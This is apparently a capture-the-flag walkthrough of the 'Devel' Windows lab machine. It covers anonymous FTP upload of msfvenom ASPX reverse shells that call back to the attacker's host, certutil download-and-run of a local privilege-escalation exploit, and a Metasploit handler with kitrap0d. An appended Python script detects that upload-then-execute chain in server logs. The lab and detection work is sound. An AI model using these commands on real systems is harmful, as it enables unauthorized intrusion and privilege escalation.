Devel Writeup - Hack The Box

TryHackMe Devel Walkthrough – Manual and Metasploit Methods

Devel is a beginner-friendly vulnerable machine that highlights risks caused by default configurations. It can be exploited using publicly available tools and basic enumeration.


Nmap Scan

We begin with a basic nmap scan to discover open ports and services:

nmap -sC -sV -p- MACHINE_IP

From the results, we find two key open ports:

  • 21 (FTP) – with anonymous login enabled
  • 80 (HTTP) – hosting a web server

Visit the website on port 80 – a welcome image (welcome.png) is displayed.

We notice that this file also appears in the FTP directory. This suggests the web server pulls files directly from the FTP root.

To confirm, upload a file (test.txt) using anonymous FTP, then access it via the browser:

ftp MACHINE_IP
put test.txt


Step 2: Web Tech Detection

Using Wappalyzer or similar tools, we identify the site runs Microsoft ASP.NET.

After quick research, we confirm .aspx is the extension in use.


Method 1: Manual Exploitation (Netcat)

Generate a reverse shell payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > rev.aspx

Upload the payload via FTP:

ftp MACHINE_IP
put rev.aspx

Start a listener:

nc -lvnp 4444

Execute the payload via browser:

http://MACHINE_IP/rev.aspx

We receive a shell as a low-privileged user.


Privilege Escalation (Manual)

Run systeminfo to gather system details:

systeminfo

Search for known exploits using OS version info:

Search: Windows 7 Enterprise build 7600 x86 exploit

Download with searchsploit, serve via Python:

searchsploit -m exploit/windows/local/XXXXXXXX
python3 -m http.server 80

Download and run from victim using certutil:

certutil -urlcache -f http://YOUR_IP/exploit.exe exploit.exe
exploit.exe


Flags

Flag 1: Flag:1

Flag 2: Flag:2


Method 2: Automated Exploitation (Metasploit)

Generate a Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f aspx > shell.aspx

Upload it to the server via FTP.

Set up Metasploit multi/handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
run

Trigger the shell:

http://MACHINE_IP/shell.aspx

Get Meterpreter access.

Run post-exploitation module:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Exploit with ms10_015_kitrap0d.


Final Flags

Flag 1: Flag:1

Flag 2: Flag:2


Conclusion

Devel demonstrates the risk of misconfigured services (FTP, ASP.NET) and how attackers can exploit them with simple privilege escalation techniques. Both manual and Metasploit methods highlight the same vulnerabilities but with different workflows.
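
From the defender's side, the upload-then-request chain that both methods rely on is visible in the server's own FTP and HTTP logs. The following is an added example, not part of the original writeup: it correlates the two logs and flags anonymous FTP uploads of server-executable files that are later requested over HTTP. The log lines are constructed samples in W3C extended format; the field set, the anonymous usernames and the extension list are assumptions to adjust for the actual server.

```python
"""Correlate anonymous FTP uploads of executable files with later HTTP requests."""
from datetime import datetime

# Extensions the web server executes instead of serving statically (assumed list).
EXECUTABLE_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".cshtml")

# Constructed sample logs (W3C extended format, documentation IP ranges).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2023-08-20 10:01:12 203.0.113.7 anonymous STOR /test.txt 226
2023-08-20 10:04:40 203.0.113.7 anonymous STOR /rev.aspx 226
2023-08-20 10:09:03 198.51.100.9 deploy STOR /default.aspx 226
"""
HTTP_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2023-08-20 10:02:00 203.0.113.7 GET /test.txt 200
2023-08-20 10:05:31 203.0.113.7 GET /rev.aspx 200
2023-08-20 10:10:00 198.51.100.20 GET /default.aspx 200
"""

def parse_w3c(text):
    """Yield one dict per entry, taking column names from the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            stamp = row["date"] + " " + row["time"]
            row["ts"] = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S")
            yield row

def find_upload_then_execute(ftp_text, http_text, anon_users=("anonymous", "ftp")):
    """Return one alert per HTTP request for a file an anonymous FTP user uploaded."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        path = r["cs-uri-stem"].lower()
        if (r["cs-method"] == "STOR" and r["sc-status"].startswith("2")
                and r["cs-username"].lower() in anon_users
                and path.endswith(EXECUTABLE_EXT)):
            uploads[path] = r  # successful anonymous upload of an executable file
    alerts = []
    for r in parse_w3c(http_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and r["ts"] >= up["ts"]:
            delay = int((r["ts"] - up["ts"]).total_seconds())
            alerts.append({"path": up["cs-uri-stem"], "uploader": up["c-ip"],
                           "requester": r["c-ip"], "delay_s": delay})
    return alerts
```

On the sample data only `/rev.aspx` is flagged: `test.txt` is not executable by the server, and `default.aspx` was uploaded by an authenticated account. The underlying fix remains disabling anonymous write access and keeping the FTP root out of the web root.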

Source: https://blog.hanzalaghayasabbasi.com/posts/devel/
Author: Hanzala Ghayas Abbasi
Published at: 2023-08-20
License: CC BY-NC-SA 4.0